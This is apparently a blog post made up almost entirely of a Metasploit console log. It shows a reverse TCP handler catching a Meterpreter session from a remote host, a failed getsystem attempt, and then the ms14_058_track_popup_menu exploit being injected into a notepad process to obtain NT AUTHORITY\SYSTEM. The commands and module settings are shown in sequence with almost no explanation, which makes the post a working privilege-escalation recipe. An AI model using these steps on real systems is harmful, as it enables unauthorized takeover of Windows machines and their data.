WINDOWS PRIVILEGE ESCALATION EXPLOIT (TRACK_POPUP_MENU)

[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.3:7000
[*] Starting the payload handler…
msf exploit(handler) >
[*] Sending stage (957487 bytes) to 179.197.253.231
[*] Meterpreter session 1 opened (192.168.1.3:7000 -> 179.197.253.231:49233) at 2016-02-01 14:15:22 -0600

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > getuid
Server username: MsTutorial-PC\Ms Tutorial
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >
Background session 1? [y/N]

Start Privilege Here

msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Launching notepad to host the exploit…
[+] Process 1080 launched.
[*] Reflectively injecting the exploit DLL into 1080…
[*] Injecting exploit into 1080…
[*] Exploit injected. Injecting payload into 1080…
[*] Payload injected. Executing exploit…
[*] Sending stage (957487 bytes) to 192.168.1.4
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.4:49234) at 2016-02-01 14:17:08 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

By  Moisés Oliver

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s